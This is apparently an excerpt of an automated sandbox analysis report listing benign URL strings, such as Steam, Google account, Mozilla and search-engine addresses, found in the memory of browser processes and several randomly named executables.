Source: chrome.exe, 00000010.00000003.3113410518.000044C001100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3111024822.000044C0010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3112059549.000044C000CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3111314765.000044C000F78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3112153876.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3110890431.000044C001070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3113602675.000044C00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3111666200.000044C00109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3112300126.000044C000FB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3112111133.000044C000EB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3113175567.000044C000474000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3110965936.000044C001080000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 00000010.00000003.3113410518.000044C001100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3111024822.000044C0010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3112059549.000044C000CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3111314765.000044C000F78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3112153876.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3110890431.000044C001070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3113602675.000044C00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3111666200.000044C00109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3112300126.000044C000FB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3112111133.000044C000EB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3113175567.000044C000474000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3110965936.000044C001080000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: d1834e5726.exe, 0000000B.00000002.2698776978.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: d1834e5726.exe, 0000000B.00000002.2698776978.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: d1834e5726.exe, 0000000B.00000002.2698776978.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: ccdb824191.exe, 00000013.00000003.3413631228.000000000126D000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3352890856.0000000001252000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3465996069.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3356052850.000000000126C000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3206485194.0000000001252000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3392719887.000000000126D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8325000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3437424456.00000269D83A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3456131295.00000269D9FB8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3437424456.00000269D83DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3437424456.00000269D8346000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: ccdb824191.exe, 0000000F.00000003.3157196383.0000000005994000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3296530271.0000000005B4D000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3457147283.0000000005664000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: ccdb824191.exe, 0000000F.00000003.3157196383.0000000005994000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3296530271.0000000005B4D000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3457147283.0000000005664000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: 95bf820dd4.exe, 0000000E.00000003.3219654068.00000000036A5000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3061961515.000000000591B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3062107281.000000000591B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3061855263.000000000591E000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3214434079.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3215170912.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3213891314.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3353614651.0000000005658000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3356732212.0000000005658000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3351249630.000000000565B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000014.00000003.3137188158.000010A000270000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136678140.000010A00026C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3137331455.000010A000274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000014.00000003.3137188158.000010A000270000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136678140.000010A00026C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3137331455.000010A000274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000014.00000003.3137188158.000010A000270000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136678140.000010A00026C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3137331455.000010A000274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000014.00000003.3137188158.000010A000270000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136678140.000010A00026C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3137331455.000010A000274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000010.00000003.3128318055.000044C000E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
Source: chrome.exe, 00000010.00000003.3128318055.000044C000E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
Source: chrome.exe, 00000010.00000003.3128318055.000044C000E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
Source: chrome.exe, 00000014.00000003.3137188158.000010A000270000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136678140.000010A00026C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3137331455.000010A000274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000014.00000003.3137188158.000010A000270000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136678140.000010A00026C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3137331455.000010A000274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000014.00000003.3137188158.000010A000270000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136678140.000010A00026C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3137331455.000010A000274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000014.00000003.3137188158.000010A000270000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136678140.000010A00026C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3137331455.000010A000274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000014.00000003.3137188158.000010A000270000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136678140.000010A00026C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3137331455.000010A000274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000014.00000003.3137188158.000010A000270000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136678140.000010A00026C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3137331455.000010A000274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000014.00000003.3137188158.000010A000270000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136678140.000010A00026C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3137331455.000010A000274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000014.00000003.3137188158.000010A000270000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136678140.000010A00026C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3137331455.000010A000274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000014.00000003.3137188158.000010A000270000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136678140.000010A00026C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3137331455.000010A000274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000014.00000003.3137188158.000010A000270000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136678140.000010A00026C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3137331455.000010A000274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3417660527.00000269CC203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: chrome.exe, 00000010.00000003.3153890473.000044C001718000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152627843.000044C0017B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152426467.000044C0017AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3153064493.000044C001768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: firefox.exe, 00000027.00000002.3445046773.00000269D9254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.s
Source: d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: ccdb824191.exe, 0000000F.00000003.3205040006.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3204434338.00000000059C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3423342277.00000269D79AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3467663342.00000269DBC6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: ccdb824191.exe, 0000000F.00000003.3205040006.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3204434338.00000000059C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3423342277.00000269D79AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3467663342.00000269DBC6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8325000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8325000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8325000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8325000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: 95bf820dd4.exe, 0000000E.00000003.3219654068.00000000036A5000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3061961515.000000000591B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3062107281.000000000591B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3061855263.000000000591E000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3214434079.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3215170912.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3213891314.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3353614651.0000000005658000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3356732212.0000000005658000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3351249630.000000000565B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: 95bf820dd4.exe, 0000000E.00000003.3219654068.00000000036A5000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3061961515.000000000591B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3062107281.000000000591B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3061855263.000000000591E000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3214434079.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3215170912.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3213891314.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3353614651.0000000005658000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3356732212.0000000005658000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3351249630.000000000565B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 95bf820dd4.exe, 0000000E.00000003.3219654068.00000000036A5000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3061961515.000000000591B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3062107281.000000000591B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3061855263.000000000591E000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3214434079.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3215170912.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3213891314.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3353614651.0000000005658000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3356732212.0000000005658000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3351249630.000000000565B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: chrome.exe, 00000010.00000003.3112544180.000044C000CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.3311631555.000010A000020000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000010.00000003.3113547382.000044C000EF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3105195237.000044C000CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3106481493.000044C000CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103487201.000044C000CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3109312816.000044C000EF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3106211605.000044C000EF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3112544180.000044C000CC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
